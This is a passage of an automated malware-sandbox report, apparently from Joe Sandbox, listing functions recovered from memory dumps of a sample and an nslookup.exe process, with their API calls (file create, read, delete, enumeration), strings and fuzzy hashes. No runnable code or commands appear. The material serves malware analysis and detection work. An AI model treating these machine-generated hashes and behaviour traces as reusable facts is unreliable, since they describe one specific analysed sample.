Function 01BEB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01C2728C

Strings

RTL: Re-Waiting, xrefs: 01C272C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01C27294
RTL: Resource at %p, xrefs: 01C272A3

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 29b8653f3a1ccd256234cde4454e9f1f7d4f33ddb9911af3a491536c2d5ed8dc
Instruction ID: e14ec4b69e09707caad24923bbe597cd3b6827e0218554e97feaad657c570864
Opcode Fuzzy Hash: 29b8653f3a1ccd256234cde4454e9f1f7d4f33ddb9911af3a491536c2d5ed8dc
Instruction Fuzzy Hash: D1410E31600323EBDB29DE29CD81B6AB7E5FBA5710F100658F955EB280DB31E9528BD1

Function 01C62300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01C6238D
___swprintf_l.LIBCMT ref: 01C623B3

Strings

%%%u, xrefs: 01C62384
]:%u, xrefs: 01C623AA

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 701e0eedb047bed7c3886cf0a6737c76aa39295118af2168219821056820aaac
Instruction ID: 69b3d692e338e3a683c502957c68a399311a724190249f7db0ed99d7b4d015d9
Opcode Fuzzy Hash: 701e0eedb047bed7c3886cf0a6737c76aa39295118af2168219821056820aaac
Instruction Fuzzy Hash: 0F318872A00219DFDB20DE2DCC80BFE77FCEB54A50F4445AAE949E3140EB30DA559B60

Function 01BF7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01BF7E8B

Strings

+, xrefs: 01BF7DE8
-, xrefs: 01BF7DDD

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: d1cf59503821497f63baa0f1f1f30df0900f73a79146ed5c971c734342ddde5f
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: E7919471E002469AEF2CDF6DC880ABEBBA5EF44320F5446DEEB55E72C0DB3099498751

Function 01BB9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01BB9175
$, xrefs: 01BB9191

Memory Dump Source

Source File: 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b80000_A4mmSHCUi2.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 1159162158a91225ae034ac00dcbdad6612f339851a1a1d27b5ba5076a972ad1
Instruction ID: c6635411ba199bfa5b72caa6fe5ed790edb6136f3a1d2a80eecba71e34d9c1da
Opcode Fuzzy Hash: 1159162158a91225ae034ac00dcbdad6612f339851a1a1d27b5ba5076a972ad1
Instruction Fuzzy Hash: B2813C75D00269DBDB35CB54CC44BEEB7B4AF08714F0041EAAA1AB7680E7709E80DFA0

Analysis Process: nslookup.exePID: 8020, Parent PID: 4908COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.6%
Total number of Nodes:	435
Total number of Limit Nodes:	67

Executed Functions

Function 02EBC400 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000), ref: 02EBC4E4
FindNextFileW.KERNELBASE(?,00000010), ref: 02EBC51F
FindClose.KERNEL32(?), ref: 02EBC52A

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 9e4993b701b4d375d9cc4e2037c9fa9fb6db059c3d76938ddf00cc8a981d0c62
Instruction ID: 321c022de37773732d50baa6f4c4fbb93f744f06a72acfb764b5180e760e766b
Opcode Fuzzy Hash: 9e4993b701b4d375d9cc4e2037c9fa9fb6db059c3d76938ddf00cc8a981d0c62
Instruction Fuzzy Hash: FA3183B19402087BDB21DBA4CD85FFF77BD9F44708F24945DB909AB180D670AA85CBA0

Function 02EC8EE0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02EC8FDB

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e2dc7c101cb6e8ec4de849fbb757b23549ef4edfdb9caa3fdbace20b3e4fc811
Instruction ID: cefebb0ace8ce8fdab480cb24139decfe23ae3a5b109a4e532941f455e9192a2
Opcode Fuzzy Hash: e2dc7c101cb6e8ec4de849fbb757b23549ef4edfdb9caa3fdbace20b3e4fc811
Instruction Fuzzy Hash: E631D4B5A40648AFDB14DF98D981EEEB7B9EF8C314F108219F919A7340D730A851CFA4

Function 02EC9050 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,6457F9B2,02EC1152,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02EC9130

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 5958e4654e23dae9bc70f9b36da0052df615e0b407c65bfd4f1247254a689473
Instruction ID: 3220fc9c95a4e2e02b08fcd207b3f0a9612782cd382df065fe62063c9950dd5b
Opcode Fuzzy Hash: 5958e4654e23dae9bc70f9b36da0052df615e0b407c65bfd4f1247254a689473
Instruction Fuzzy Hash: B93104B5A00208AFDB14DF98C881EEFB7B9EF8C314F108219F918A7344D774A9118FA5

Function 02EC9140 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 02EC91D0

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 15acd6d134f533d4a83026a2f363df081b11f6cc1ae96a9c53239de27c7c7918
Instruction ID: 969f5351414906068d4501d073d13f4fae17261ff7460894db83513bf4047347
Opcode Fuzzy Hash: 15acd6d134f533d4a83026a2f363df081b11f6cc1ae96a9c53239de27c7c7918
Instruction Fuzzy Hash: A311A075A80608BFE720EB98CC41FAFB7ADDF85314F10810DF9189B280E77579118BA5

Function 02EC91E0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02EC9214

Memory Dump Source

Source File: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2ea0000_nslookup.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 788d6db8aa51d3292159542fcc9c6c554d484a591bd7defbf02d3267138116a8
Instruction ID: b824676f1854202b369ad5c42aa5bc72a42a246e8e13cb53381261c3367f6df3
Opcode Fuzzy Hash: 788d6db8aa51d3292159542fcc9c6c554d484a591bd7defbf02d3267138116a8
Instruction Fuzzy Hash: 91E086362846147FE510EA69CC41F9B779DDFC5764F018019FA1CAB240C671791187F0

Function 037F4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F434A

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: affd127364eb15fa395ec0c9da9a279db42f2b2d0e777e06e6a52fbceed77134
Instruction ID: f9142ddd47b0155b655a193696286f5b5b8964efdb97fae46775b78b7a8219f7
Opcode Fuzzy Hash: affd127364eb15fa395ec0c9da9a279db42f2b2d0e777e06e6a52fbceed77134
Instruction Fuzzy Hash: 4C900231605C04569180B1984C84546400597E0301B65C051E1429598C8B148A9A5362

Function 037F4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F465A

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8fd79fc0cc6de248c19d07c52ef8fc6c901ab1cf463d8836959d8515027e3b6c
Instruction ID: c41895994d9f71d89464a5aeb4113ffdb57c6862dff4fd13ecb1172a1e429e75
Opcode Fuzzy Hash: 8fd79fc0cc6de248c19d07c52ef8fc6c901ab1cf463d8836959d8515027e3b6c
Instruction Fuzzy Hash: 0E900261601904864180B1984C04406600597E13013A5C155A15595A4C87188999926A

Function 037F2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2B6A

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 92a29cd2cfe3bd6d7ba158c4afcc9a715e7a558d03453355ac1f03967fa3025d
Instruction ID: ac26a2285cae84040f16500242d37aae98b7ceaff32afbf39b6b041723e2efef
Opcode Fuzzy Hash: 92a29cd2cfe3bd6d7ba158c4afcc9a715e7a558d03453355ac1f03967fa3025d
Instruction Fuzzy Hash: 3D900261202804474145B1984814616400A87E0201B65C061E20195D4DC62589D56126

Function 037F2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2AFA

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 457de46937dcc9c7686e010f4f13fa7b223d26ece0ea8936b189f5d9b8da1b29
Instruction ID: 8c3d953b3f79827c15c2e473204f10d65d28183459abd3d79fd3659dbaad914e
Opcode Fuzzy Hash: 457de46937dcc9c7686e010f4f13fa7b223d26ece0ea8936b189f5d9b8da1b29
Instruction Fuzzy Hash: E6900225221804460185F5980A0450B044597D63513A5C055F241B5D4CC72189A95322

Function 037F2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2ADA

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f101523b0bebb3c38398da7c7ab64921a662ec92ea24e58b21217ca3f7ab1cc3
Instruction ID: 30b499a2cf25beb6ec0a3077e325e48db9263dddc5c9023c8f890ec6f0a42e63
Opcode Fuzzy Hash: f101523b0bebb3c38398da7c7ab64921a662ec92ea24e58b21217ca3f7ab1cc3
Instruction Fuzzy Hash: BA900225211804470145F5980B04507004687D5351365C061F201A594CD72189A55122

Function 037F2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2F3A

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6385131c8e52b4a84c1c3990d30f2532990b7a7a46cd3d1f0f5d47013539310
Instruction ID: 54a2df4c1178308cba238af79f71dcba580c79842aea6fc733a22667ebd94118
Opcode Fuzzy Hash: c6385131c8e52b4a84c1c3990d30f2532990b7a7a46cd3d1f0f5d47013539310
Instruction Fuzzy Hash: F890026134180886D140B1984814B060005C7E1301F65C055E2069598D8719CD966127

Function 037F2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2FEA

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 888a44bb999803e6cdfc99d49125123f55938ac19468f4280ddf2f977285df3a
Instruction ID: c6ad4cec06c920d5e4b17981735e0aa47df70ceeaa6f33d0aab98a31c36c8834
Opcode Fuzzy Hash: 888a44bb999803e6cdfc99d49125123f55938ac19468f4280ddf2f977285df3a
Instruction Fuzzy Hash: 2E900221211C0486D240B5A84C14B07000587D0303F65C155A1159598CCA1589A55522

Function 037F2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2FBA

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc306354d669f9a2e2449e28ad08f4574c42fbd2e1f3556af16d269a17e52ff9
Instruction ID: 46bdce9019bea14b25d1929839fa4961bdc551da6cb7dfd01eadb5afbe7f2908
Opcode Fuzzy Hash: bc306354d669f9a2e2449e28ad08f4574c42fbd2e1f3556af16d269a17e52ff9
Instruction Fuzzy Hash: 85900221601804864180B1A88C449064005ABE1211765C161A199D594D865989A95666

Function 037F2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2EEA

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2f214a82d709bc6467b6ff059654e774bbe5c09acdbe137659f2e6f55c9822b0
Instruction ID: deb5d16967f17954d5a34234ffacf0d1b9172386a9b4dc68d4261e85f8786b7f
Opcode Fuzzy Hash: 2f214a82d709bc6467b6ff059654e774bbe5c09acdbe137659f2e6f55c9822b0
Instruction Fuzzy Hash: 47900261201C0847D180B5984C04607000587D0302F65C051A3069599E8B298D956136

Function 037F2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2D3A

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 284ab8053d4657549005a267c262ecee8c14db4b7aa1a7a496698fba21678ba2
Instruction ID: 97ddec86c438708ae7fa55a2c1a71027dd9d923dc3ed70fa3101ccbbfa6addc4
Opcode Fuzzy Hash: 284ab8053d4657549005a267c262ecee8c14db4b7aa1a7a496698fba21678ba2
Instruction Fuzzy Hash: FF90022130180447D180B19858186064005D7E1301F65D051E1419598CDA15899A5223

Function 037F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2D1A

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f663a67665e6abea6d18efc0a4f19bb4e741b95daf1e53b67a30240bf8c428f1
Instruction ID: e788396ad36edf468e6c497ef18da8f6554f9fc435ebae053382662397b30b96
Opcode Fuzzy Hash: f663a67665e6abea6d18efc0a4f19bb4e741b95daf1e53b67a30240bf8c428f1
Instruction Fuzzy Hash: 9090022921380446D1C0B198580860A000587D1202FA5D455A101A59CCCA1589AD5322

Function 037F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2DFA

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50c15a05634add92026cf3f4a5770da17d9445b19a093c1c6866d14967c3e497
Instruction ID: 935f83b1f0513f427cad9edf65ba97974a3110083698ea868966e0c31ea6faf6
Opcode Fuzzy Hash: 50c15a05634add92026cf3f4a5770da17d9445b19a093c1c6866d14967c3e497
Instruction Fuzzy Hash: 6190023120180857D151B1984904707000987D0241FA5C452A142959CD97568A96A122

Function 037F2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2DDA

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9dc38560329577e9fa79d491c7c855fb1d1ff8f29575a35fc0d222ecada88292
Instruction ID: 7f380164f0b8de020f304a2888b9fc6051fc197d8822c424f97c4dea5211acb3
Opcode Fuzzy Hash: 9dc38560329577e9fa79d491c7c855fb1d1ff8f29575a35fc0d222ecada88292
Instruction Fuzzy Hash: 3A900221242845965585F1984804507400697E02417A5C052A2419994C8626999AD622

Function 037F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2C7A

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a43d15499c26a0494db8c1bc013613961f4e2994b0373df09164bf4f96afa768
Instruction ID: bf99ee264953e06efcf0dbb37cd5153ad44cec6c9413e2947461ec5a32cb2df4
Opcode Fuzzy Hash: a43d15499c26a0494db8c1bc013613961f4e2994b0373df09164bf4f96afa768
Instruction Fuzzy Hash: A990023120188C46D150B198880474A000587D0301F69C451A542969CD879589D57122

Function 037F2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2C6A

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 510e49ac7ee81ed6c5148bd8f97101e71ce496f7955d9861de7f820292510052
Instruction ID: e19875b6286f0294924e5f380c6abcb054d41c17ea8d7b2f4a9730fdcd866ea9
Opcode Fuzzy Hash: 510e49ac7ee81ed6c5148bd8f97101e71ce496f7955d9861de7f820292510052
Instruction Fuzzy Hash: AC90023120180C86D140B1984804B46000587E0301F65C056A1129698D8715C9957522

Function 037F2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F2CAA

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d9ebf32827af364531d28b28300c96a69d9a47696c2a37b457006386753a02c0
Instruction ID: 7193a2956de66f400076ac62661ac1f5684e581e2bcc2947be83fd9e13c2aaaf
Opcode Fuzzy Hash: d9ebf32827af364531d28b28300c96a69d9a47696c2a37b457006386753a02c0
Instruction Fuzzy Hash: 4F90023120180846D140B5D85808646000587E0301F65D051A6029599EC76589D56132

Function 037F35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 037F35CA

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 034ff7a2e34cafa02cbf0147fe024e30e6d125b2780acfdd9264402207a7547c
Instruction ID: f76fba1385456d8cdb66f1510c3c3329b54f7a2f8cafb6302a310d31634b757b
Opcode Fuzzy Hash: 034ff7a2e34cafa02cbf0147fe024e30e6d125b2780acfdd9264402207a7547c
Instruction Fuzzy Hash: BB90023160590846D140B1984914706100587D0201F75C451A14295ACD87958A9565A3

